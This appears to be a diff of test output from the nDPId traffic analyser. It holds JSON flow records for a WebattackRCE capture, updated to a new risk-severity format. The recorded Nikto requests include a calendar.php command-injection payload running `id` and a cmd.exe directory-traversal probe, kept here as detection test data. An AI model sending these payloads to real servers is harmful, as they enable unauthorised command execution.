 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":721,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":721,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277857,"flow_last_seen":1576420277857,"flow_idle_time":7440000,"flow_min_l4_payload_len":248,"flow_max_l4_payload_len":248,"flow_tot_l4_payload_len":248,"flow_avg_l4_payload_len":248,"midstream":1,"ts_msec":1576420277857,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51004,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00804{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":721,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":721,"flow_packet_id":1,"flow_last_seen":1576420277857,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":314,"pkt_l4_len":280,"ts_msec":1576420277857,"pkt":"AAAAAAAAAAAAAAAACABFAAEsZgtAAEAG1b5\/AAABfwAAAcc8H5AWK18ypPoEwIAYAED\/IAAAAQEICp1m\/4mdZv+JR0VUIC9odGZvcnVtL2NhbGVuZGFyLnBocD9jYWxiaXJ0aGRheXM9MSZhY3Rpb249Z2V0ZGF5JmRheT0yMDAxLTgtMTUmY29tbWE9JTIyO2VjaG8lMjAnJzslMjBlY2hvJTIwJTYwaWQlMjAlNjA7ZGllKCk7ZWNobyUyMiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAzMDM5KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
-00970{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":721,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":721,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277857,"flow_last_seen":1576420277857,"flow_idle_time":7440000,"flow_min_l4_payload_len":248,"flow_max_l4_payload_len":248,"flow_tot_l4_payload_len":248,"flow_avg_l4_payload_len":248,"midstream":1,"ts_msec":1576420277857,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51004,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/htforum\/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003039)"}}
+01159{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":721,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":721,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277857,"flow_last_seen":1576420277857,"flow_idle_time":7440000,"flow_min_l4_payload_len":248,"flow_max_l4_payload_len":248,"flow_tot_l4_payload_len":248,"flow_avg_l4_payload_len":248,"midstream":1,"ts_msec":1576420277857,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51004,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/htforum\/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003039)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":722,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":722,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277858,"flow_last_seen":1576420277858,"flow_idle_time":7440000,"flow_min_l4_payload_len":246,"flow_max_l4_payload_len":246,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":246,"midstream":1,"ts_msec":1576420277858,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51006,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00801{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":722,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":722,"flow_packet_id":1,"flow_last_seen":1576420277858,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":312,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":312,"pkt_l4_len":278,"ts_msec":1576420277858,"pkt":"AAAAAAAAAAAAAAAACABFAAEqtcxAAEAGhf9\/AAABfwAAAcc+H5DIWozz4BLqQYAYAED\/HgAAAQEICp1m\/4qdZv+KR0VUIC9ib2FyZC9jYWxlbmRhci5waHA\/Y2FsYmlydGhkYXlzPTEmYWN0aW9uPWdldGRheSZkYXk9MjAwMS04LTE1JmNvbW1hPSUyMjtlY2hvJTIwJyc7JTIwZWNobyUyMCU2MGlkJTIwJTYwO2RpZSgpO2VjaG8lMjIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzAzOSkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"}
-00968{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":722,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":722,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277858,"flow_last_seen":1576420277858,"flow_idle_time":7440000,"flow_min_l4_payload_len":246,"flow_max_l4_payload_len":246,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":246,"midstream":1,"ts_msec":1576420277858,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51006,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/board\/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003039)"}}
+01157{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":722,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":722,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277858,"flow_last_seen":1576420277858,"flow_idle_time":7440000,"flow_min_l4_payload_len":246,"flow_max_l4_payload_len":246,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":246,"midstream":1,"ts_msec":1576420277858,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51006,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/board\/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003039)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":723,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":723,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277860,"flow_last_seen":1576420277860,"flow_idle_time":7440000,"flow_min_l4_payload_len":250,"flow_max_l4_payload_len":250,"flow_tot_l4_payload_len":250,"flow_avg_l4_payload_len":250,"midstream":1,"ts_msec":1576420277860,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51008,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00808{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":723,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":723,"flow_packet_id":1,"flow_last_seen":1576420277860,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":316,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":316,"pkt_l4_len":282,"ts_msec":1576420277860,"pkt":"AAAAAAAAAAAAAAAACABFAAEumzdAAEAGoJB\/AAABfwAAAcdAH5B97qINvJ0VaoAYAED\/IgAAAQEICp1m\/4ydZv+MR0VUIC9jb21tdW5pdHkvY2FsZW5kYXIucGhwP2NhbGJpcnRoZGF5cz0xJmFjdGlvbj1nZXRkYXkmZGF5PTIwMDEtOC0xNSZjb21tYT0lMjI7ZWNobyUyMCcnOyUyMGVjaG8lMjAlNjBpZCUyMCU2MDtkaWUoKTtlY2hvJTIyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAzMDM5KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00972{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":723,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":723,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277860,"flow_last_seen":1576420277860,"flow_idle_time":7440000,"flow_min_l4_payload_len":250,"flow_max_l4_payload_len":250,"flow_tot_l4_payload_len":250,"flow_avg_l4_payload_len":250,"midstream":1,"ts_msec":1576420277860,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51008,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/community\/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003039)"}}
+01161{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":723,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":723,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277860,"flow_last_seen":1576420277860,"flow_idle_time":7440000,"flow_min_l4_payload_len":250,"flow_max_l4_payload_len":250,"flow_tot_l4_payload_len":250,"flow_avg_l4_payload_len":250,"midstream":1,"ts_msec":1576420277860,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51008,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/community\/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003039)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":724,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":724,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277861,"flow_last_seen":1576420277861,"flow_idle_time":7440000,"flow_min_l4_payload_len":243,"flow_max_l4_payload_len":243,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":243,"midstream":1,"ts_msec":1576420277861,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51010,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00797{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":724,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":724,"flow_packet_id":1,"flow_last_seen":1576420277861,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":309,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":309,"pkt_l4_len":275,"ts_msec":1576420277861,"pkt":"AAAAAAAAAAAAAAAACABFAAEntyFAAEAGhK1\/AAABfwAAAcdCH5DLAI4n0VAE+IAYAED\/GwAAAQEICp1m\/42dZv+NR0VUIC92Yi9jYWxlbmRhci5waHA\/Y2FsYmlydGhkYXlzPTEmYWN0aW9uPWdldGRheSZkYXk9MjAwMS04LTE1JmNvbW1hPSUyMjtlY2hvJTIwJyc7JTIwZWNobyUyMCU2MGlkJTIwJTYwO2RpZSgpO2VjaG8lMjIgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMwNDApDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
-00965{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":724,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":724,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277861,"flow_last_seen":1576420277861,"flow_idle_time":7440000,"flow_min_l4_payload_len":243,"flow_max_l4_payload_len":243,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":243,"midstream":1,"ts_msec":1576420277861,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51010,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/vb\/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003040)"}}
+01154{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":724,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":724,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277861,"flow_last_seen":1576420277861,"flow_idle_time":7440000,"flow_min_l4_payload_len":243,"flow_max_l4_payload_len":243,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":243,"midstream":1,"ts_msec":1576420277861,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51010,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/vb\/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003040)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":725,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":725,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277863,"flow_last_seen":1576420277863,"flow_idle_time":7440000,"flow_min_l4_payload_len":250,"flow_max_l4_payload_len":250,"flow_tot_l4_payload_len":250,"flow_avg_l4_payload_len":250,"midstream":1,"ts_msec":1576420277863,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51012,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00808{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":725,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":725,"flow_packet_id":1,"flow_last_seen":1576420277863,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":316,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":316,"pkt_l4_len":282,"ts_msec":1576420277863,"pkt":"AAAAAAAAAAAAAAAACABFAAEuCCBAAEAGM6h\/AAABfwAAAcdEH5ADaDEo9nQ1BIAYAED\/IgAAAQEICp1m\/4+dZv+PR0VUIC92YnVsbGV0aW4vY2FsZW5kYXIucGhwP2NhbGJpcnRoZGF5cz0xJmFjdGlvbj1nZXRkYXkmZGF5PTIwMDEtOC0xNSZjb21tYT0lMjI7ZWNobyUyMCcnOyUyMGVjaG8lMjAlNjBpZCUyMCU2MDtkaWUoKTtlY2hvJTIyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMwNDApDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
-00972{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":725,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":725,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277863,"flow_last_seen":1576420277863,"flow_idle_time":7440000,"flow_min_l4_payload_len":250,"flow_max_l4_payload_len":250,"flow_tot_l4_payload_len":250,"flow_avg_l4_payload_len":250,"midstream":1,"ts_msec":1576420277863,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51012,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/vbulletin\/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003040)"}}
+01161{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":725,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":725,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277863,"flow_last_seen":1576420277863,"flow_idle_time":7440000,"flow_min_l4_payload_len":250,"flow_max_l4_payload_len":250,"flow_tot_l4_payload_len":250,"flow_avg_l4_payload_len":250,"midstream":1,"ts_msec":1576420277863,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51012,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/vbulletin\/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003040)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":726,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":726,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277864,"flow_last_seen":1576420277864,"flow_idle_time":7440000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"ts_msec":1576420277864,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51014,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":726,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":726,"flow_packet_id":1,"flow_last_seen":1576420277864,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":215,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":215,"pkt_l4_len":181,"ts_msec":1576420277864,"pkt":"AAAAAAAAAAAAAAAACABFAADJt5hAAEAGhJR\/AAABfwAAAcdGH5CwLY6th0R7wIAYAED+vQAAAQEICp1m\/5CdZv+QR0VUIC9fdnRpX2Jpbi9mcGNvdW50LmV4ZSBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAzMDg5KQ0KDQo="}
-00871{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":726,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":726,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277864,"flow_last_seen":1576420277864,"flow_idle_time":7440000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"ts_msec":1576420277864,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51014,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/_vti_bin\/fpcount.exe","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003089)"}}
+01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":726,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":726,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277864,"flow_last_seen":1576420277864,"flow_idle_time":7440000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"ts_msec":1576420277864,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51014,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/_vti_bin\/fpcount.exe","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003089)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":727,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":727,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277866,"flow_last_seen":1576420277866,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"ts_msec":1576420277866,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51016,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":727,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":727,"flow_packet_id":1,"flow_last_seen":1576420277866,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"ts_msec":1576420277866,"pkt":"AAAAAAAAAAAAAAAACABFAADHtYVAAEAGhql\/AAABfwAAAcdIH5CyuYy6IN3YVoAYAED+uwAAAQEICp1m\/5KdZv+SR0VUIC9zaXRlL2VnL3NvdXJjZS5hc3AgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMxMjYpDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
-00870{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":727,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":727,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277866,"flow_last_seen":1576420277866,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"ts_msec":1576420277866,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51016,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site\/eg\/source.asp","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003126)"}}
+01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":727,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":727,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277866,"flow_last_seen":1576420277866,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"ts_msec":1576420277866,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51016,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site\/eg\/source.asp","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003126)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":728,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":728,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277867,"flow_last_seen":1576420277867,"flow_idle_time":7440000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":177,"midstream":1,"ts_msec":1576420277867,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51018,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00707{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":728,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":728,"flow_packet_id":1,"flow_last_seen":1576420277867,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":243,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":243,"pkt_l4_len":209,"ts_msec":1576420277867,"pkt":"AAAAAAAAAAAAAAAACABFAADlWiBAAEAG4fB\/AAABfwAAAcdKH5CvgWMmQVkzqIAYAED+2QAAAQEICp1m\/5OdZv+TR0VUIC9jZXJ0c3J2Ly4uJWMwJWFmLi4vd2lubnQvc3lzdGVtMzIvY21kLmV4ZT8vYytkaXIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMxOTApDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
